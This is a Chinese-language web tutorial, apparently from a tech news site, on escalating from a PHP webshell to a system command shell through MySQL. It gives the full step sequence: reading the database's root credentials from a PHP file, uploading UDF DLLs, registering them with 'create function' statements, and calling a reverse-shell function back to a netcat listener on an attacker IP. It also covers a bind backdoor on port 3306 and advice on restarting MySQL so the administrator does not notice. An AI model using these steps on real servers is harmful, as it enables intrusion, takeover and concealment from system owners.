WEBSHELL提升权限又一招(Mysql漏洞)
创始人
2024-07-26 06:01:14
0

MYSQLl弱口令可以拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才能进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。目前我拿我另外一台机器做示范,已把PHPSHELL传上去了,如图1

WEBSHELL提升权限又一招(Mysql漏洞)

一般来说连接MYSQL的帐户密码非常好找,随便编辑一个PHP文件,就看到了。如图2

WEBSHELL提升权限又一招(Mysql漏洞)

看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,如图3

WEBSHELL提升权限又一招(Mysql漏洞)

连接成功了,目前开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.

出现SQL语句成功执行!如图4

WEBSHELL提升权限又一招(Mysql漏洞)

 

离拿到CMDSHELL已不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,如图5

WEBSHELL提升权限又一招(Mysql漏洞)

执行成功,然后看看我们的NC有反映没,如图6

WEBSHELL提升权限又一招(Mysql漏洞) 

成功得到CMSHELL,不过这时对方的MYSQL已假死咯,我们要把MYSQL服务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接所有外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix相同,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 执行语句成功后,然后我们就开始激活这个函数,输入语句:select my_udfdoor (''); 然后用nc连接3306端口,然后输入f**k 就能得到一个cmdshell了如图7

WEBSHELL提升权限又一招(Mysql漏洞)

测试结束 

WEBSHELL提升权限的技巧(Mysql漏洞)大家应该掌握了,希望大家多多了解这方面的知识。

【编辑推荐】

  1. 详细解析数据加密
  2. 内部网中的密码管理
  3. 探讨ECC加密被破译的可能性
  4. 信息安全的核心之密码技术 上
  5. 密码遗忘通关手册 为你减少不必要的麻烦 上

相关内容

热门资讯

如何允许远程连接到MySQL数... [[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
如何利用交换机和端口设置来管理... 在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
各种千兆交换机的数据接口类型详... 千兆交换机有很多值得学习的地方,这里我们主要介绍各种千兆交换机的数据接口类型,作为局域网的主要连接设...
施耐德电气数据中心整体解决方案... 近日,全球能效管理专家施耐德电气正式启动大型体验活动“能效中国行——2012卡车巡展”,作为该活动的...
Windows恶意软件20年“... 在Windows的早期年代,病毒游走于系统之间,偶尔删除文件(但被删除的文件几乎都是可恢复的),并弹...
规避非法攻击 用好路由器远程管... 单位在市区不同位置设立了科技服务点,每一个服务点的员工都通过宽带路由器进行共享上网,和单位网络保持联...
范例解读VB.NET获取环境变... VB.NET编程语言的使用范围非常广泛,可以帮助开发人员处理各种程序中的需求,而且还能对移动设备进行...
20个非常棒的扁平设计免费资源 Apple设备的平面图标PSD免费平板UI 平板UI套件24平图标Freen平板UI套件PSD径向平...